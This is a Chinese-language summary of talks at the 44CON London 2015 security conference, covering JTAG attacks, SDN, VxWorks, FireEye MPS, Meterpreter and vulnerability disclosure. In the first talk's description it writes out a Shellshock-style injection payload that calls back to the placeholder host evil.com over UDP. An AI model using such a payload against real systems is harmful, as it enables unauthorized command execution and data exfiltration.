44CON倫敦:英國最大安全會議議題集合
44CON,現(xiàn)在稱作44CON 倫敦,是英國最大的綜合年度安全會議和培訓活動,吸引了當?shù)匾约皝碜允澜绺鞯氐淖顑?yōu)秀,最活躍的信息安全行業(yè)的演講者來到英國。
在2015年9月9日-11日舉辦的“44 CON 倫敦”峰會中,共有兩輪議題,這里挑選了一些議題進行了簡單介紹。
第一輪
捕捉非同步漏洞
議題中,演講者展示漏洞利用誘導回調會遠遠不止() { :;}; echo 1 > /dev/udp/evil.com/53來找盲注和異步XXE、(DOM)XSS、SQLi、SMTP以及單純XML注入攻擊。像是二階SQL盲注以及通過cronijobs或者異步登錄功能進行的shell命令注入,能夠輕松進行滲透測試并獲得成效。
JTAG利用:5根線,5種方法獲取root shell
JTAG幾乎與每個硬件相關的攻擊都有關系。這個議題枚舉了將jtag訪問“check”(檢測)變?yōu)楦鵶hell訪問“checkmate”的不同方式。每個例子都將展示一個通過JTAG獲取root權限的特殊方式。而每種方式又能不同程度地廣泛應用于不同硬件體系結構并實現(xiàn)。演說中具體的代碼和腳本將被公布。
軟件定義網(wǎng)絡的安全性(SDN)
SDN由研發(fā)到生產部署的快速發(fā)展,總是伴隨著一些令人擔憂的安全問題。此議題中概括了SDN技術的出現(xiàn),它們暴露出的受攻擊面以及一些在SDN控制器中被發(fā)現(xiàn)漏洞。最后我們將會著眼于目前提升SDN控制器安全性的努力。
窺探兵馬俑VPN的內部
虛擬專用網(wǎng)絡(VPN)十分受歡迎,大部分公司都有VPN,讓員工能夠遠程辦公。而在一些特殊情況下,VPN也被用于犯罪,因為它可以掩蓋真實地址。FirstWatch公開了一家為與中國相關的多個VPN品牌有合作的服務商,最后統(tǒng)計發(fā)現(xiàn)兵馬俑VPN節(jié)點生態(tài)系統(tǒng)包括了世界各地的1500多個節(jié)點。這些節(jié)點大多是由被攻擊者入侵的Windows服務器搭建而成。
反逆向工程
演講者Richo將帶領與會者一起回顧一個傳統(tǒng)AOT編譯器以及運行時加載器的基本體系結構,并介紹了這些與現(xiàn)代字節(jié)代碼VM(python、ruby等)操作之間的相似之處。有了這些新的發(fā)現(xiàn),我們便可以編寫一個工具去逆向分析一個被混淆的ruby腳本示例文件。然而,我們沒有直接對字節(jié)代碼進行分析,而是使用了全功能性的VM,來挖掘各種反分析技術的部署。
15分鐘Linux事件響應實時分析
在15分鐘內,研究者應該對于發(fā)生了的事情有個粗略的了解,即便出現(xiàn)“陣亡”,也要處于一個更利于分析的位置。Shell腳本展示了對系統(tǒng)的最小化干擾,并通過網(wǎng)絡將所有信息發(fā)送給取證工作站。
與會人員并不需要具備超越基礎Linux的知識,而演講者將分享一些用于實時分析的工具,并為首次接觸到shell腳本編程的人們進行一些清晰介紹。
鑄造USB兵工廠
議題向我們展示了硬件開發(fā)之旅:USB兵工廠、開源硬件設計,以及在安全應用程序中添加一個閃存驅動器大小的電腦。
演講者總結了從開源工具中汲取的的經驗,制作外形小、規(guī)格高的嵌入式設備,以及如安全啟動和ARM TrustZone執(zhí)行的結構與安全性能。
C++逆向工程的介紹
議題概述了當前字體安全的前沿研究,回顧了80年代、90年代至今經歷的排版與各種字體引擎之間關系的變遷,后面列舉了潛在的攻擊面,演講者將討論廣泛專有OpenType/CFF實現(xiàn)的逆向工程過程,例如Windows kernel ATMFD.DLL模塊(Adobe Type Manager Font Driver),并提供了對根本原因的深入分析和開發(fā)過程中發(fā)現(xiàn)的產品漏洞利用,其中包括微軟、Adobe Reader、DirectWrite(Internet Explorer)、FreeType等安全漏洞。
其他議題
前往翡翠城: 基于AV的Ring-1
分析惡意的Office文檔
動手操作JTAG獲取root shell
第二輪
Windows 10:前進兩步,后退一步
Windows 10為了成為最安全的操作系統(tǒng)加入了很多新功能,如控制流保護(CFG, Control Flow Guard)、憑證隔離(Credentials Isolation)。但是與此同時,很多新功能中存在的漏洞卻又將系統(tǒng)的安全性降低了。這個議題介紹的就是這些新的安全功能中的漏洞,這些漏洞證明,要想在實踐中真正做到安全還是很難的。
中間人攻擊測試框架(MITMf):將中間人攻擊帶入21世紀
你是否已經厭倦了管理無數(shù)的腳本執(zhí)行中間人攻擊?
你是否厭倦了以不撞南墻不回頭地決心去尋找Ettercap篩選器不工作的原因?
然而,中間人攻擊測試框架集合了新舊中間人攻擊技術于一個框架中。Python語言編寫,有極強的可拓展性和可靠性,將帶領中間人攻擊邁入現(xiàn)在的21世紀。
VxWorks安全性分析:從石器時代到星際穿越
VxWorks是世界上使用最廣泛的實時操作系統(tǒng),部署在嵌入式系統(tǒng)中。VxWorks的市場遍布各種關鍵的領域,包括好奇號火星探測器、波音787夢幻客機等。在這些項目中的應用使得VxWorks的安全性成為了一個重要的問題。我們團隊對VxWorks進行了充分的安全分析,包括它支持的網(wǎng)絡協(xié)議和操作系統(tǒng)安全機制。我們會展示我們開發(fā)的,對VxWorks進行評估的工具,我們工具的目標就是通過在python中實現(xiàn)WdbRPC協(xié)議對VxWorks進行高效的滲透測試。屆時我們還會展示幾個漏洞。最后我們還會展示一個遠程代碼執(zhí)行的漏洞,在互聯(lián)網(wǎng)進行的快速掃描結果顯示,至少10萬臺運行VxWorks的設備接入了互聯(lián)網(wǎng),因此這個漏洞的影響廣泛。
玩把火: 攻擊 FireEye MPS
這個議題會針對FireEye的惡意軟件保護系統(tǒng)(MPS)最近爆出的大量漏洞進行回顧,其中還包括了一些正在修復的漏洞。這些漏洞包括對管理web界面的命令行注入漏洞、本地權限提升漏洞等。
演講者將對這些問題的解決方案進行討論。
如何讓惡意軟件分析師抓狂?
這個議題討論的是惡意軟件作者使用的不同惡意軟件取證或者逆向工程的方式。演講者針對反取證的歷史以及現(xiàn)在那些方式正在被采用進行深入探討。
了解Meterpreter的新亮點
Meterpreter在過去幾年中發(fā)展迅猛,不斷地迎接新的功能和更加穩(wěn)定的特性。
這個議題將加深人們對于Materpreter的變化與成就的了解。不僅過去的特性在此所有提及,新的性能也得到了充分的討論,而議題重點將放在如何利用這些新特點幫助建立“隊伍”以及鞏固他們的立足點。
負責任地披露(漏洞): 有人在乎嗎?
Oj和Dan均從事安全評估工作很多年了。他們講設備中發(fā)現(xiàn)的重大漏洞報道給供應商后,有時供應商會表示關注并在隨后采取行動,然而更多的情況是,供應商假裝努力解決問題,實則完全忽略了研究員,有的甚至公開說“走開”。演講者將“負責任地披露漏洞”所面臨的挑戰(zhàn)一一指出,而這些公司也陷入了是否應該幫自己的解決問題困境。
其他議題
是否有EFI怪獸在你的蘋果里面?
智能電表平臺的故事與工具集
網(wǎng)關野蠻人:對于攻擊者工具箱的考驗
Pwn2Own 案例研究——Windows 8.1 64位IE的漏洞利用
到瘋狂的火車鐵軌上去——AUTH
老狗,新花樣——使用PowerShell進行取證分析
福利
44CON London 2015-PPT:http://www.slideshare.net/44Con